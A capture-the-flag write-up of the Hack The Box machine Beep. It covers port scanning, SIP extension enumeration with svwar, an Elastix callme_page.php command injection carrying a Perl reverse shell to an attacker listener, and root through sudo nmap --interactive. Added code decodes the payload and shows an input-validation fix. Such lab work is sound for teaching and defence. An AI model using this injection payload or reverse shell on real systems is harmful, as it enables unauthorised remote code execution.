⚠️ Notice: the techniques, ideas and tools covered in this article are provided solely for security-oriented learning and exchange. If you do not agree, please close this page. Nobody may use them for illegal purposes or for profit; anyone who does bears the consequences alone.
ℹ️ Target information
🔍 Port scan
┌──(liona㉿kali)-[~/Workspace/HTB/Beep]
└─$ sudo nmap -sS -p- --max-retries=0 10.10.10.7 -oN allports.txt -oX allports.xml
[sudo] password for liona:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-07 16:27 CST
Warning: 10.10.10.7 giving up on port because retransmission cap hit (0).
Nmap scan report for 10.10.10.7 (10.10.10.7)
Host is up (0.29s latency).
Not shown: 57005 closed tcp ports (reset), 8514 filtered tcp ports (no-response)
PORT      STATE SERVICE
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
143/tcp   open  imap
443/tcp   open  https
878/tcp   open  unknown
993/tcp   open  imaps
995/tcp   open  pop3s
3306/tcp  open  mysql
4190/tcp  open  sieve
4445/tcp  open  upnotifyp
4559/tcp  open  hylafax
5038/tcp  open  unknown
10000/tcp open  snet-sensor-mgmt

Nmap done: 1 IP address (1 host up) scanned in 90.04 seconds
# Nmap 7.92 scan initiated Thu Apr 7 16:31:47 2022 as: nmap -sV -sC -p 22,25,80,110,111,143,443,878,993,995,3306,4190,4445,4559,5038,10000 -Pn -oN nmap.txt -oX nmap.xml 10.10.10.7
Nmap scan report for 10.10.10.7 (10.10.10.7)
Host is up (0.31s latency).

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_pop3-capabilities: RESP-CODES TOP STLS USER AUTH-RESP-CODE PIPELINING LOGIN-DELAY(0) IMPLEMENTATION(Cyrus POP3 server v2) EXPIRE(NEVER) APOP UIDL
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
111/tcp   open  rpcbind    2 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2          111/tcp     rpcbind
|   100000  2          111/udp     rpcbind
|   100024  1          875/udp     status
|_  100024  1          878/tcp     status
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_imap-capabilities: LISTEXT MULTIAPPEND Completed LIST-SUBSCRIBED STARTTLS UIDPLUS X-NETSCAPE NAMESPACE NO IMAP4rev1 IMAP4 ACL URLAUTHA0001 SORT=MODSEQ OK CATENATE ANNOTATEMORE MAILBOX-REFERRALS CONDSTORE IDLE THREAD=ORDEREDSUBJECT ATOMIC THREAD=REFERENCES RENAME LITERAL+ BINARY CHILDREN RIGHTS=kxte UNSELECT SORT QUOTA ID
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_imap-ntlm-info: ERROR: Script execution failed (use -d to debug)
443/tcp   open  ssl/http   Apache httpd 2.2.3 ((CentOS))
|_http-server-header: Apache/2.2.3 (CentOS)
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after:  2018-04-07T08:22:08
|_ssl-date: 2022-04-07T08:35:18+00:00; -1s from scanner time.
|_http-title: Elastix - Login page
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-known-key: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
3306/tcp  open  mysql      MySQL (unauthorized)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: -1s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Apr 7 16:37:10 2022 -- 1 IP address (1 host up) scanned in 322.36 seconds
🤔 Intelligence analysis
Without further ado, open the web interface first. It is the Elastix login page that the scan already flagged on 443; try the classic login-bypass injection admin' -- - in the form. It has no effect, so enumerate directories to see whether anything suspicious exists.
┌──(liona㉿kali)-[~/Workspace/HTB/Beep]
└─$ gobuster dir -u https://10.10.10.7 -w ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt --add-slash -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.7
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                ../../SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Add Slash:               true
[+] Timeout:                 10s
===============================================================
2022/04/08 00:00:01 Starting gobuster in directory enumeration mode
===============================================================
/images/              (Status: 200) [Size: 29898]
/cgi-bin/             (Status: 403) [Size: 286]
/help/                (Status: 200) [Size: 346]
/icons/               (Status: 200) [Size: 31006]
/themes/              (Status: 200) [Size: 3172]
/modules/             (Status: 200) [Size: 13132]
/mail/                (Status: 200) [Size: 2411]
/admin/               (Status: 302) [Size: 0] [--> config.php]
/static/              (Status: 200) [Size: 1276]
/mailman/             (Status: 403) [Size: 286]
Browsing every one of these directories turned up nothing useful, so the only remaining option is to search for known Elastix vulnerabilities. Two turn up; start with the first one:
#!/usr/bin/env python3
# Elastix/FreePBX callme_page.php command injection: the callmenum parameter is
# forwarded to the Asterisk Manager Interface unsanitised, so the CRLF-separated
# "Application: system" / "Data: <command>" lines below become extra headers of
# the Originate action and Asterisk runs the command for us.
rhost = "10.10.10.7"
lhost = "10.10.14.26"
lport = 4444
extension = "233"   # must be a real extension on the PBX (found with svwar below)

# Reverse shell payload
url = ('https://' + str(rhost) + '/recordings/misc/callme_page.php?action=c&callmenum='
       + str(extension)
       + '@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'
       + str(lhost) + '%3a' + str(lport)
       + '%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A')
print(url)
The extension value here has to be brute-forced. The tool for that is svwar, and the exact command is: svwar -e1-1000 -m INVITE 10.10.10.7 | grep reqauth
+------------+----------------+
| Extension  | Authentication |
+------------+----------------+
| 212        | weird          |
| 233        | reqauth        |
| 214        | weird          |
+------------+----------------+
That pins the extension down as 233.
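What svwar is actually doing when it prints reqauth or weird, as an added example (my own code, not svwar's): it sends one SIP request per extension (INVITE here, as in the command above) and classifies the reply by status code. The mapping used below (401/407 means the PBX issued a digest challenge, so the extension exists; 200 means it exists and needs no credentials; 404 means it does not exist and is not listed; anything else is reported as weird) is my reading of svwar's behaviour. The SIP replies are constructed to reproduce the page's table, not captured from the target, and nothing is sent over the network.

```python
"""Offline model of svwar's extension enumeration verdicts (added example, not svwar's code)."""
import re

STATUS_RE = re.compile(r"^SIP/2\.0 (\d{3}) ([^\r\n]*)")
REALM_RE = re.compile(r'^(?:WWW|Proxy)-Authenticate:.*?realm="([^"]*)"', re.M | re.I)


def build_invite(target, extension, src="10.10.14.26"):
    """Minimal SIP INVITE for one extension, carrying the headers RFC 3261 makes mandatory."""
    return (f"INVITE sip:{extension}@{target} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP {src}:5060;branch=z9hG4bK-{extension}\r\n"
            f"From: <sip:{extension}@{target}>;tag=svwar\r\n"
            f"To: <sip:{extension}@{target}>\r\n"
            f"Call-ID: {extension}@{src}\r\n"
            "CSeq: 1 INVITE\r\n"
            "Max-Forwards: 70\r\n"
            "Content-Length: 0\r\n\r\n")


def classify(response):
    """Map a SIP reply to an svwar-style verdict; None means the PBX says no such extension."""
    m = STATUS_RE.match(response)
    if not m:
        return "weird"
    code = int(m.group(1))
    if code in (401, 407):   # digest challenge: the extension exists and has a secret
        return "reqauth"
    if code == 200:          # accepted without credentials
        return "noauth"
    if code == 404:          # Asterisk's answer for an unknown extension
        return None
    return "weird"           # anything else deserves a manual look


def challenge_realm(response):
    """Realm from a 401/407 challenge; on an Elastix box this is normally 'asterisk'."""
    m = REALM_RE.search(response)
    return m.group(1) if m else None


def scan(responses):
    """responses: {extension: raw SIP reply}. Returns the svwar-style table as {extension: verdict}."""
    table = {}
    for ext, resp in sorted(responses.items(), key=lambda kv: int(kv[0])):
        verdict = classify(resp)
        if verdict is not None:
            table[ext] = verdict
    return table


def existing_extensions(responses):
    """The '| grep reqauth' step from the page: extensions that answered with a challenge."""
    return [ext for ext, verdict in scan(responses).items() if verdict == "reqauth"]


# Constructed replies (not captured from 10.10.10.7), shaped to reproduce the page's table.
SAMPLE_REPLIES = {
    "212": "SIP/2.0 503 Service Unavailable\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n",
    "233": ("SIP/2.0 401 Unauthorized\r\n"
            'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="3b2a1c9d"\r\n'
            "CSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n"),
    "214": "SIP/2.0 603 Declined\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n",
    "500": "SIP/2.0 404 Not Found\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n",
}

if __name__ == "__main__":
    for ext, verdict in scan(SAMPLE_REPLIES).items():
        print(f"| {ext:<10} | {verdict:<14} |")
    print("realm:", challenge_realm(SAMPLE_REPLIES["233"]))
```

The practical point is that a 401 is a positive signal: the PBX only challenges for an account it knows about, which is why reqauth rather than noauth or weird is what you grep for. A real scan of 1000 extensions produces 1000 INVITEs, which on a production PBX shows up in the Asterisk logs and in any fail2ban-style SIP brute-force rule.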
💥 Exploitation
Getting USER.TXT
With the extension ID in hand, write the script:
┌──(liona㉿kali)-[~/Workspace/HTB/Beep]
└─$ cat exploit.py
#!/usr/bin/env python3
# Same callme_page.php AMI injection as above, now pointed at the listener on port 1234.
rhost = "10.10.10.7"
lhost = "10.10.14.26"
lport = 1234
extension = "233"   # valid extension confirmed by svwar

# Reverse shell payload
url = ('https://' + str(rhost) + '/recordings/misc/callme_page.php?action=c&callmenum='
       + str(extension)
       + '@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'
       + str(lhost) + '%3a' + str(lport)
       + '%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A')
print(url)
Start a listener, then run the script.
┌──(liona㉿kali)-[~/Workspace/HTB/Beep]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
┌──(liona㉿kali)-[~/Workspace/HTB/Beep]
└─$ python exploit.py
https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.26%3a1234%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A
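To see why that URL gives a shell, it helps to decode it rather than copy it. The block below is an added example (my own code, not the exploit script above). It assumes, as the URL's layout implies, that callme_page.php pastes callmenum unescaped into an Asterisk Manager Interface (AMI) Originate action, so each %0D%0A starts a new AMI header and "Application: system" / "Data: <command>" make Asterisk execute the command. It rebuilds the same payload from its parts with urllib doing the encoding, decodes the page's URL to show the header lines AMI receives, and includes the input check the server side should have had. Nothing here touches the network.

```python
"""Build and decode the callme_page.php injection locally (added example, not the exploit's code)."""
import re
from urllib.parse import parse_qs, quote, urlsplit

# Perl reverse shell exactly as it appears, once decoded, in the page's URL.
PERL_SHELL = ("perl -MIO -e '$p=fork;exit,if($p);"
              '$c=new IO::Socket::INET(PeerAddr,"{lhost}:{lport}");'
              "STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'")

# The URL printed on this page (copied verbatim), used to cross-check build_url().
PAGE_URL = ("https://10.10.10.7/recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n"
            "%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29"
            "%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%2210.10.14.26%3a1234%22%29%3bSTDIN-%3e"
            "fdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A")


def build_callmenum(extension, lhost, lport):
    """Injected value: a real dial target, CRLF, extra AMI headers, then the blank line that ends an action."""
    data = PERL_SHELL.format(lhost=lhost, lport=lport)
    return "\r\n".join([f"{extension}@from-internal/n",
                        "Application: system",
                        f"Data: {data}",
                        "", ""])


def build_url(rhost, extension, lhost, lport):
    """Same request as the page's script, but assembled from the structured payload."""
    return (f"https://{rhost}/recordings/misc/callme_page.php?action=c&callmenum="
            + quote(build_callmenum(extension, lhost, lport), safe="@/"))


def ami_lines(url):
    """Decode callmenum from a URL and split it into the header lines AMI will see."""
    callmenum = parse_qs(urlsplit(url).query, keep_blank_values=True)["callmenum"][0]
    return callmenum.split("\r\n")


# Server-side fix: a dial-able number only. CR, LF and any header syntax are rejected,
# so nothing in callmenum can ever become a second AMI header.
CALLMENUM_RE = re.compile(r"[0-9*#]{1,20}")


def is_safe_callmenum(value):
    return CALLMENUM_RE.fullmatch(value) is not None


if __name__ == "__main__":
    for line in ami_lines(PAGE_URL):
        print(repr(line))
    print("safe:", is_safe_callmenum("233"),
          is_safe_callmenum(build_callmenum("233", "10.10.14.26", 1234)))
```

The decoded lines make the bug obvious: the first line is the legitimate Local channel target, and everything after the first CRLF is attacker-controlled AMI. The regex check is the whole fix; encoding or escaping the value is not enough because AMI has no quoting mechanism for header values.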
That yields the attack URL; paste it into the browser to trigger it, and the listener catches the shell.
┌──(liona㉿kali)-[~/Workspace/HTB/Beep]
└─$ nc -nvlp 1234
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.7.
Ncat: Connection from 10.10.10.7:37004.
id
uid=100(asterisk) gid=101(asterisk)
ls
ks-script-_a_xql
ks-script-_a_xql.log
ntpC5OCyW
sess_2pmh5e2nu85nnj8c8aih748kc2
sess_31bkn9j9rhmapvuecq7au5tua1
sess_48lp7n2s1ehte6sv17mavv4bh3
sess_4qcq58i5cp9n56he31hgtd2eh7
sess_b666c0g4f6f8kht7tdcpf8tf10
sess_fn9vpu5ob4ke7q4p1p13ekvb15
sess_h6qcpmim0c1jfraoh2om0q5q11
sess_ll4dsh4tksmo9fhr5slb85hlg1
sess_lmb8v0tf49979c44ruhmolqub1
sess_o31o5epfs746itl502229ri0m1
sess_u29ajiinajgjncsbhv1bpcu361
sess_vca0v5tr9ira69sntceh3hu7f0
trunk_dump.sql
vmware-config-3543.0
vmware-installer-3348.0
vmware-installer-3412.0
vmware-root
python -c "import pty;pty.spawn('/bin/bash')"
bash-3.2$ ls /home
ls /home
fanis  spamfilter
bash-3.2$ cat /home/fanis/user.txt
cat /home/fanis/user.txt
f8a3621e369969607544e53b40a6a94f
bash-3.2$
Getting ROOT.TXT
bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

# Root shell through nmap's interactive mode
bash-3.2$ sudo /usr/bin/nmap --interactive
sudo /usr/bin/nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# ls
ls
ks-script-_a_xql                 sess_ll4dsh4tksmo9fhr5slb85hlg1
ks-script-_a_xql.log             sess_lmb8v0tf49979c44ruhmolqub1
ntpC5OCyW                        sess_o31o5epfs746itl502229ri0m1
sess_2pmh5e2nu85nnj8c8aih748kc2  sess_u29ajiinajgjncsbhv1bpcu361
sess_31bkn9j9rhmapvuecq7au5tua1  sess_vca0v5tr9ira69sntceh3hu7f0
sess_48lp7n2s1ehte6sv17mavv4bh3  trunk_dump.sql
sess_4qcq58i5cp9n56he31hgtd2eh7  vmware-config-3543.0
sess_b666c0g4f6f8kht7tdcpf8tf10  vmware-installer-3348.0
sess_fn9vpu5ob4ke7q4p1p13ekvb15  vmware-installer-3412.0
sess_h6qcpmim0c1jfraoh2om0q5q11  vmware-root
sh-3.2# cat /root/root.txt
cat /root/root.txt
19a0cdfc5f303bf456420c60aac4123d
sh-3.2#
📝 Summary
Key points
nmap's interactive shell mode: nmap --interactive followed by !sh. This mode has long been removed from Nmap, so it only works here because the box ships the old 4.11 build; with a newer nmap, several of the other NOPASSWD entries in the sudo -l output (chmod, chown, yum among them) are the usual candidates to look at instead.
svwar for scanning VoIP extensions: the reqauth verdict marks extensions the PBX challenges for credentials, which is what the callme_page.php exploit needs as a valid dial target.